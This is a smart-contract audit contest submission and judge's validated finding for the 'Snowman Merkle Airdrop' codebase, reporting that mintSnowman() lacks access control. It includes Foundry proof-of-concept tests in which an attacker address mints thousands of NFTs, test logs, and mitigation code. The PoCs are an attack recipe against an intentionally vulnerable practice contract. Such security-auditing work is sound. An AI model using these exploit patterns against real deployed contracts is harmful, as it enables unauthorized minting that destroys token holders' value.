Snowman Merkle Airdrop
AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
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Submission Details
Severity: high
Valid

No Access Control on mintSnowman()

sharthak18

Description

  • The mintSnowman() function has no access control. Any address can mint any number of NFTs to any recipient.

function mintSnowman(address receiver, uint256 amount) external {
// NO ACCESS CONTROL - anyone can call this!
@> for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_tokenCounter);
s_tokenCounter++;
}
}

Attack Scenario:

// Attacker mints 1 million NFTs
attacker.call(snowman.mintSnowman(attacker, 1_000_000));
// NFT value = 0, protocol destroyed

Risk

Likelihood:

  • Attacker can mint as many as NFT they can

Impact:

  • Anyone can mint unlimited NFTs, destroying token economics

Proof of Concept

Create a file inside test folder and paste the code
This code prove that how the attacker can mint limitless NFT

// SPDX-License-Identifier: MIT
pragma solidity 0.8.24;
import {Test, console} from "forge-std/Test.sol";
import {Snow} from "../src/Snow.sol";
import {Snowman} from "../src/Snowman.sol";
import {SnowmanAirdrop} from "../src/SnowmanAirdrop.sol";
import {DeploySnow} from "../script/DeploySnow.s.sol";
import {MockWETH} from "../src/mock/MockWETH.sol";
contract AllVulnerabilitiesPoC is Test {
// Snow.sol contracts
Snow snow;
DeploySnow deployer;
MockWETH weth;
address collector;
uint256 FEE;
// Snowman.sol and SnowmanAirdrop.sol contracts
Snowman snowman;
SnowmanAirdrop airdrop;
bytes32 merkleRoot = bytes32(0x1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef);
// Test addresses
address alice;
address bob;
address charlie;
address attacker;
function setUp() public {
// Deploy Snow.sol contracts
deployer = new DeploySnow();
snow = deployer.run();
weth = deployer.weth();
collector = deployer.collector();
FEE = deployer.FEE();
// Deploy Snowman.sol and SnowmanAirdrop.sol contracts
snowman = new Snowman("ipfs://snowman");
airdrop = new SnowmanAirdrop(merkleRoot, address(snow), address(snowman));
// Create test addresses
alice = makeAddr("alice");
bob = makeAddr("bob");
charlie = makeAddr("charlie");
attacker = makeAddr("attacker");
// Fund users
deal(alice, 100 ether);
deal(bob, 100 ether);
deal(charlie, 100 ether);
deal(attacker, 100 ether);
weth.mint(alice, 100 * FEE);
weth.mint(bob, 100 * FEE);
weth.mint(charlie, 100 * FEE);
weth.mint(attacker, 100 * FEE);
}
/// @notice CRITICAL: Anyone can mint unlimited Snowman NFTs
function test_Snowman_UnrestrictedMinting() public {
vm.startPrank(attacker);
snowman.mintSnowman(attacker, 1000);
assertEq(snowman.balanceOf(attacker), 1000);
assertEq(snowman.getTokenCounter(), 1000);
snowman.mintSnowman(alice, 500);
assertEq(snowman.balanceOf(alice), 500);
vm.stopPrank();
}
/// @notice CRITICAL: Attacker can grief by minting to random addresses
function test_Snowman_GriefingAttack() public {
address victim = makeAddr("victim");
vm.prank(attacker);
snowman.mintSnowman(victim, 10000);
assertEq(snowman.balanceOf(victim), 10000);
}}

Recommended Mitigation

Using immutable address and checks can privent from attacker

address private immutable i_airdropContract;
constructor(string memory baseUri, address airdropContract) ERC721("Snowman", "SNM") {
s_baseUri = baseUri;
i_airdropContract = airdropContract;
}
function mintSnowman(address receiver, uint256 amount) external {
if (msg.sender != i_airdropContract) revert Unauthorized();
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_tokenCounter);
s_tokenCounter++;
}
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 6 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

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